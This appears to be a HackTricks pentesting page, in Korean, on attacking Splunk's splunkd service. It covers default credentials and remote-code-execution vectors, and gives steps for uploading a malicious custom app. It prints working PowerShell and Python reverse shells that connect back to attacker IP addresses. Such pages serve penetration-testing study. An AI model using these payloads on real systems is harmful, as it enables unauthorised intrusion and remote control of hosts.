8089 - Pentesting Splunkd

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๊ธฐ๋ณธ ์ •๋ณด

  • ๋ฐ์ดํ„ฐ ์ˆ˜์ง‘, ๋ถ„์„ ๋ฐ ์‹œ๊ฐํ™”๋ฅผ ์œ„ํ•œ ๋กœ๊ทธ ๋ถ„์„ ๋„๊ตฌ
  • ๋ณด์•ˆ ๋ชจ๋‹ˆํ„ฐ๋ง ๋ฐ ๋น„์ฆˆ๋‹ˆ์Šค ๋ถ„์„์— ์ผ๋ฐ˜์ ์œผ๋กœ ์‚ฌ์šฉ๋จ
  • ๊ธฐ๋ณธ ํฌํŠธ:
  • ์›น ์„œ๋ฒ„: 8000
  • Splunkd ์„œ๋น„์Šค: 8089

์ทจ์•ฝ์  ๋ฒกํ„ฐ:

  1. ๋ฌด๋ฃŒ ๋ฒ„์ „ ์•…์šฉ
  • ํ‰๊ฐ€ํŒ ๋ฒ„์ „์€ 60์ผ ํ›„ ์ž๋™์œผ๋กœ ๋ฌด๋ฃŒ ๋ฒ„์ „์œผ๋กœ ์ „ํ™˜๋จ
  • ๋ฌด๋ฃŒ ๋ฒ„์ „์€ ์ธ์ฆ์ด ์—†์Œ
  • ๊ด€๋ฆฌ๋˜์ง€ ์•Š์„ ๊ฒฝ์šฐ ์ž ์žฌ์ ์ธ ๋ณด์•ˆ ์œ„ํ—˜
  • ๊ด€๋ฆฌ์ž๊ฐ€ ๋ณด์•ˆ ๋ฌธ์ œ๋ฅผ ๊ฐ„๊ณผํ•  ์ˆ˜ ์žˆ์Œ
  1. ์ž๊ฒฉ ์ฆ๋ช… ์•ฝ์ 
  • ์ด์ „ ๋ฒ„์ „: ๊ธฐ๋ณธ ์ž๊ฒฉ ์ฆ๋ช… admin:changeme
  • ์ตœ์‹  ๋ฒ„์ „: ์„ค์น˜ ์ค‘ ์„ค์ •๋œ ์ž๊ฒฉ ์ฆ๋ช…
  • ์•ฝํ•œ ๋น„๋ฐ€๋ฒˆํ˜ธ ์‚ฌ์šฉ ๊ฐ€๋Šฅ์„ฑ (์˜ˆ: admin, Welcome, Password123)
  1. ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ ๊ธฐํšŒ
  • ์—ฌ๋Ÿฌ ์ฝ”๋“œ ์‹คํ–‰ ๋ฐฉ๋ฒ•:
  • ์„œ๋ฒ„ ์ธก Django ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜
  • REST ์—”๋“œํฌ์ธํŠธ
  • ์Šคํฌ๋ฆฝํŠธ ์ž…๋ ฅ
  • ๊ฒฝ๊ณ  ์Šคํฌ๋ฆฝํŠธ
  • ํฌ๋กœ์Šค ํ”Œ๋žซํผ ์ง€์› (Windows/Linux)
  • ์Šคํฌ๋ฆฝํŠธ ์ž…๋ ฅ์€ ๋‹ค์Œ์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Œ:
  • Bash ์Šคํฌ๋ฆฝํŠธ
  • PowerShell ์Šคํฌ๋ฆฝํŠธ
  • ๋ฐฐ์น˜ ์Šคํฌ๋ฆฝํŠธ

์ฃผ์š” ์•…์šฉ ๊ฐ€๋Šฅ์„ฑ:

  • ๋ฏผ๊ฐํ•œ ๋ฐ์ดํ„ฐ ์ €์žฅ
  • ๋ฌด๋ฃŒ ๋ฒ„์ „์˜ ์ธ์ฆ ๋ถ€์กฑ
  • ์ž ์žฌ์ ์ธ ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰์„ ์œ„ํ•œ ์—ฌ๋Ÿฌ ๋ฒกํ„ฐ
  • ์‹œ์Šคํ…œ ์†์ƒ์„ ์œ„ํ•œ ์Šคํฌ๋ฆฝํŠธ ์ž…๋ ฅ ํ™œ์šฉ ๊ฐ€๋Šฅ์„ฑ

Shodan

  • Splunk build

RCE

์‚ฌ์šฉ์ž ์ •์˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ƒ์„ฑ

Splunk๋Š” ์‚ฌ์šฉ์ž ์ •์˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋ฐฐํฌ๋ฅผ ํ†ตํ•ด ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰์„ ์œ„ํ•œ ์ •๊ตํ•œ ๋ฐฉ๋ฒ•์„ ์ œ๊ณตํ•˜๋ฉฐ, ํฌ๋กœ์Šค ํ”Œ๋žซํผ ์Šคํฌ๋ฆฝํŒ… ๊ธฐ๋Šฅ์„ ํ™œ์šฉํ•ฉ๋‹ˆ๋‹ค. ํ•ต์‹ฌ ์•…์šฉ ๊ธฐ์ˆ ์€ Windows ๋ฐ Linux ์‹œ์Šคํ…œ์—์„œ ๋ฆฌ๋ฒ„์Šค ์…ธ์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ์•…์„ฑ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ๋งŒ๋“œ๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

์‚ฌ์šฉ์ž ์ •์˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์€ Python, Batch, Bash ๋˜๋Š” PowerShell ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ, Splunk์—๋Š” Python์ด ์„ค์น˜๋˜์–ด ์žˆ์œผ๋ฏ€๋กœ, Windows ์‹œ์Šคํ…œ์—์„œ๋„ Python ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด ์˜ˆ์ œ๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, **bin**์—๋Š” Python ๋ฐ PowerShell ์˜ˆ์ œ๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜๋Š” ์ž์‹ ๋งŒ์˜ ๊ฒƒ์„ ๋งŒ๋“ค ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค.

์•…์šฉ ๊ณผ์ •์€ ํ”Œ๋žซํผ ์ „๋ฐ˜์— ๊ฑธ์ณ ์ผ๊ด€๋œ ๋ฐฉ๋ฒ•๋ก ์„ ๋”ฐ๋ฆ…๋‹ˆ๋‹ค:

splunk_shell/
โ”œโ”€โ”€ bin        (reverse shell scripts)
โ””โ”€โ”€ default    (inputs.conf configuration)

์ค‘์š”ํ•œ ๊ตฌ์„ฑ ํŒŒ์ผ inputs.conf๋Š” ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ํ™œ์„ฑํ™”ํ•ฉ๋‹ˆ๋‹ค:

  • disabled = 0 ์„ค์ •
  • 10์ดˆ ์‹คํ–‰ ๊ฐ„๊ฒฉ ๊ตฌ์„ฑ
  • ์Šคํฌ๋ฆฝํŠธ์˜ ์†Œ์Šค ์œ ํ˜• ์ •์˜

๋ฐฐํฌ๋Š” ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค:

  1. ์•…์„ฑ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ํŒจํ‚ค์ง€ ์ƒ์„ฑ
  2. ๊ณต๊ฒฉ ๋จธ์‹ ์—์„œ ๋ฆฌ์Šค๋„ˆ(Netcat/socat) ์„ค์ •
  3. Splunk์˜ ์ธํ„ฐํŽ˜์ด์Šค๋ฅผ ํ†ตํ•ด ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ์—…๋กœ๋“œ
  4. ์—…๋กœ๋“œ ์‹œ ์ž๋™ ์Šคํฌ๋ฆฝํŠธ ์‹คํ–‰ ํŠธ๋ฆฌ๊ฑฐ

์ƒ˜ํ”Œ Windows PowerShell ๋ฆฌ๋ฒ„์Šค ์…ธ:

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()

์ƒ˜ํ”Œ ๋ฆฌ๋ˆ…์Šค ํŒŒ์ด์ฌ ๋ฆฌ๋ฒ„์Šค ์…ธ:

import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

RCE & Privilege Escalation

๋‹ค์Œ ํŽ˜์ด์ง€์—์„œ๋Š” ์ด ์„œ๋น„์Šค๋ฅผ ์–ด๋–ป๊ฒŒ ์•…์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ค๊ณ  ์ง€์†์„ฑ์„ ์–ป์„ ์ˆ˜ ์žˆ๋Š”์ง€์— ๋Œ€ํ•œ ์„ค๋ช…์„ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

Splunk LPE and Persistence

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ